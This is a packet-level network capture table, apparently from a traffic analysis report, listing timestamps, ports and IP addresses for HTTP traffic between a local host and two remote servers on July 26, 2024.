Jul 26, 2024 12:57:49.814892054 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.814908028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.814919949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.814924002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.814939022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.814948082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.814955950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.814963102 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.814970970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.814986944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.814990044 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.815002918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.815018892 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.815021038 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.815026999 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.815057039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.815524101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.815540075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.815555096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.815571070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.815573931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.815587044 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.815618038 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.815633059 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.864905119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.864947081 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.864955902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.864964008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.864979982 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.864986897 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.864995956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.865068913 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.865106106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905009031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905069113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905086994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905102015 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905117035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905128002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905133963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905150890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905160904 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905167103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905173063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905184984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905198097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905215979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905225992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905692101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905714989 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905730963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905745983 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905747890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905762911 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905764103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905771971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905781031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905791044 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905800104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905810118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905816078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905827045 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905833006 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905838966 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905850887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.905858040 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905874968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.905891895 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.906989098 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907006025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907021046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907036066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907043934 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907052040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907063961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907067060 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907083035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907094002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907100916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907111883 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907128096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907135010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907141924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907151937 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907155991 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907169104 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907181025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907186031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907203913 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907203913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907219887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907221079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907236099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907243013 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907250881 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907263041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907278061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907284975 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907303095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907304049 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907315016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907319069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907336950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907342911 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907352924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907354116 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907375097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907392025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907403946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907419920 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907444000 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907459021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907548904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907565117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907578945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907591105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907594919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907601118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907620907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907639980 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907824039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907840967 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907866001 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907872915 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907917976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907933950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907949924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907958031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907967091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907968044 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907983065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.907987118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.907999992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908005953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908018112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908021927 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908041000 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908051968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908370018 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908385992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908402920 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908416986 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908418894 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908435106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908447981 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908457994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908466101 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908473969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908495903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908499002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908509016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908514023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908530951 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908538103 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908548117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908550024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908565998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.908571959 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908581972 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.908606052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909234047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909250021 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909265041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909277916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909286976 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909291983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909307003 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909307003 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909322023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909332991 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909337997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909351110 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909353971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909370899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909373045 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909387112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909395933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909403086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909418106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909418106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909434080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909435987 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909446955 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909450054 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.909465075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909482002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.909497023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910034895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910052061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910065889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910080910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910084009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910096884 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910100937 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910109997 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910113096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910129070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910130978 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910145044 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910146952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910161018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910177946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910214901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910624027 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910641909 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910656929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910671949 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910675049 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910687923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910695076 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910702944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910717964 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910718918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910732985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910748005 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910748005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910763979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910774946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910779953 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910792112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910794973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910809994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910816908 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910825014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.910841942 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.910866022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.911345959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.911361933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.911396980 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.911422014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.960627079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.960666895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.960684061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.960727930 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.960736036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.960762024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.960774899 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.960778952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.960817099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:49.960907936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:49.960944891 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.000889063 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.000916004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.000931978 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.000961065 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.000987053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001039028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001055002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001070023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001084089 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001116037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001266956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001285076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001298904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001312971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001315117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001331091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001342058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001344919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001375914 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001398087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001557112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001573086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001588106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001596928 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001619101 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001657009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001661062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001677036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001694918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001701117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001702070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001708984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001713037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001719952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001728058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.001746893 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.001775026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002247095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002260923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002275944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002290964 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002293110 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002306938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002315044 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002321959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002336979 CEST	80	60838	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:50.002346039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002377033 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002386093 CEST	60838	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:50.002566099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002593994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002610922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002612114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002625942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002641916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002645016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002656937 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002671957 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002674103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002700090 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002726078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.002948999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.002996922 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003030062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003046036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003076077 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003093004 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003204107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003221035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003226995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003232002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003240108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003254890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003262997 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003283978 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003448963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003463030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003478050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003492117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003521919 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003640890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003657103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003670931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003684044 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003684998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003771067 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003776073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003813028 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003813028 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.003899097 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003916025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.003947973 CEST	60836	80	192.168.2.6	198.46.178.145
